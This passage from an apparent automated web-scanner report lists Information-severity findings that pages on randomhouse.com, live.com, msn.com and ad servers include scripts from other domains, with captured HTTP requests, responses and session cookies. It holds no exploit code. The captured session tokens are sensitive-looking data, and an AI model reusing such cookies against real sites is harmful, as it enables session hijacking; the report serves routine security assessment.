Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:47:05 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20778


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.17. https://ecommerce.randomhouse.com/create-account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /create-account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:46 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 20193


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.18. https://ecommerce.randomhouse.com/password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /password.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /password.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:19:32 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 11309


<!-- forgottenPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="htt
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.19. https://ecommerce.randomhouse.com/sign-in-submit.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in-submit.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sign-in-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=212207240983843; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; s_cc=true; ResonanceSegment=1; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_sq=%5B%5BB%5D%5D; RES_TRACKINGID=686529694590717; CP=null*; rhcartitems=; SC_LINKS=%5B%5BB%5D%5D; __qca=P0-874375948-1303855562358; mbox=session#1303855598284-166145#1303858166|PC#1303855598284-166145#1366928306|check#true#1303856366;

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:26:47 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 16981


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.20. https://ecommerce.randomhouse.com/sign-in.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /sign-in.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sign-in.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/account.do?from=randomhouse
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=388CC68FD235E0B3FC2D6F4CD6E761C9.ecommerce_wrk1; SC_LINKS=%5B%5BB%5D%5D; CP=null*; mbox=check#true#1303855669|session#1303855598284-166145#1303857469|PC#1303855598284-166145#1366927609; s_cc=true; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_sq=ranhcorporate%2Cranhrollup%3D%2526pid%253Dsignin%2526pidt%253D1%2526oid%253Dhttps%25253A//ecommerce.randomhouse.com/sign-in.do%25253Ffrom%25253Drandomhouse%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:44 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16851


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

20.21. http://explore.live.com/windows-live-messenger  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /windows-live-messenger

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /windows-live-messenger?os=other HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42292
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Set-Cookie: xid=42b3abd4-6447-433c-8c48-9965439b3738&&TK2xxxxxxxxLP11&154; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1623281324&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.explore.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 26-Apr-2011 16:58:38 GMT; path=/
Set-Cookie: wlexpid=42b3abd4-6447-433c-8c48-9965439b3738; domain=.live.com; expires=Tue, 26-Apr-2011 19:08:38 GMT; path=/
Set-Cookie: wlv=A|_-d:s*ro49Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: E=P:dHXjSljSzYg=:lte5DPYyGosUE7/z2qmjFVvinU2K9vatIhifomCYPC4=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:38:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...
<div id="atdmt" style="display:none">
<script src="https://view.atdmt.com/jaction/ELMessengerenUS" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.wlxrs.com/YcXEoNNBYLrXXm83LmbiHw/liteframeworkex.js" ></script>
...[SNIP]...
</script><script type="text/javascript" src="http&#58;//js.wlxrs.com/q7c3F&#33;a9TdQSjcnoe8LBCw/shared.js"></script>
...[SNIP]...
<!-- Begin comScore Tag -->
<script type="text/javascript" src="http://js.wlxrs.com/vTTGlFvxJ2FsHeDnpRRkOw/comscore/beacon.js"></script>
...[SNIP]...

20.22. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=1676624;type=page2292;cat=page2334;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4844245901331.306? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/hhs
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:49:54 GMT
Expires: Tue, 26 Apr 2011 18:49:54 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 904

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://ads
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.23. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:45:53 GMT
Expires: Tue, 26 Apr 2011 18:45:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 3943

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script> var _l = 20
...[SNIP]...
</script><script type='text/javascript' src='http://js2.rfihub.com/js/bcC.js'></script>
...[SNIP]...
</noscript><script type="text/javascript" src="http://pixel.mathtag.com/event/js?mt_id=101241&mt_adid=100255&v1=&v2=&v3=&s1=&s2=&s3="></script>
...[SNIP]...

20.24. http://g.adspeed.net/ad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad.php?do=html&zid=14678&wd=728&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:37 GMT
Server: AdSpeed/s6
Content-Length: 789

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><script type="text/javascript"><!--
google_ad_client =
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-0078565546631069&output=html&h=600&slotname=9829251079&w=120&lmt=1303871408&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583034&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303854583065&frm=0&adk=3580742155&ga_vid=1704213550.1303854583&ga_sid=1303854583&ga_hid=204119268&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1079&bih=937&fu=0&ifi=1&dtd=239&xpc=pmJcd9hAaJ&p=http%3A//seclists.org HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 21:49:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3922

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303862766&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-shotssnapcom.html&dt=1303844977457&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303844977692&frm=0&adk=1607234649&ga_vid=1119198186.1303844978&ga_sid=1303844978&ga_hid=987644665&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1066&bih=938&fu=0&ifi=1&dtd=371&xpc=CigITRTQkA&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 19:09:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.27. http://health.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://health.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: health.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:44:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA17
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 37587
Content-Length: 37587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

20.28. http://lifestyle.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.msn.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: lifestyle.msn.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:44:47 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 33990
Content-Length: 33990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div id="subfoot"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...

20.29. http://m.adnxs.com/tt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
